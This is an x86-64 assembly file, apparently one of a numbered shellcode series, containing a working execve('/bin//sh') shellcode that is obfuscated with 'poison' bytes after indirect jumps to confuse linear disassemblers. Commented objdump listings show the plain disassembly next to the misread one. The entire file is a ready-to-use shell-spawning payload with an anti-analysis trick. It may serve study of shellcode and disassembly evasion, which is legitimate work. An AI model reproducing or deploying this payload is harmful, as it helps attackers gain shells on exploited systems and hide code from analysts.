# obfuscated version of 22.s

.globl _start

.text

_start:

	jmp *.j1(%rip)                #
	.word 0xbb48                  # poison
.j1:                              #

	xor %esi, %esi                #
	mul %esi                      # shellcode
	push %rax                     #
	mov $0x68732f2f6e69622f, %rbx #

	jmp *.j2(%rip)                #
	.word 0xbb48                  # poison
.j2:                              #

	push %rbx                     #
	push %rsp                     #
	pop %rdi                      # shellcode
	mov $59, %al                  #
	syscall                       #
_stop:

/* without jmp's
000000000040024b <_start>:
  40024b:	31 f6                	xor    %esi,%esi
  40024d:	f7 e6                	mul    %esi
  40024f:	50                   	push   %rax
  400250:	48 bb 2f 62 69 6e 2f 	movabs $0x68732f2f6e69622f,%rbx
  400257:	2f 73 68 
  40025a:	53                   	push   %rbx
  40025b:	54                   	push   %rsp
  40025c:	5f                   	pop    %rdi
  40025d:	b0 3b                	mov    $0x3b,%al
  40025f:	0f 05                	syscall
*/

/* with jmp's
000000000040024b <.text>:
  40024b:	ff 25 02 00 00 00    	jmpq   *0x2(%rip)        # 0x400253
  400251:	48 bb 31 f6 f7 e6 50 	movabs $0x2fbb4850e6f7f631,%rbx
  400258:	48 bb 2f 
  40025b:	62                   	(bad)  
  40025c:	69 6e 2f 2f 73 68 ff 	imul   $0xff68732f,0x2f(%rsi),%ebp
  400263:	25 02 00 00 00       	and    $0x2,%eax
  400268:	48                   	rex.W
  400269:	bb 53 54 5f b0       	mov    $0xb05f5453,%ebx
  40026e:	3b 0f                	cmp    (%rdi),%ecx
  400270:	05                   	.byte 0x5
*/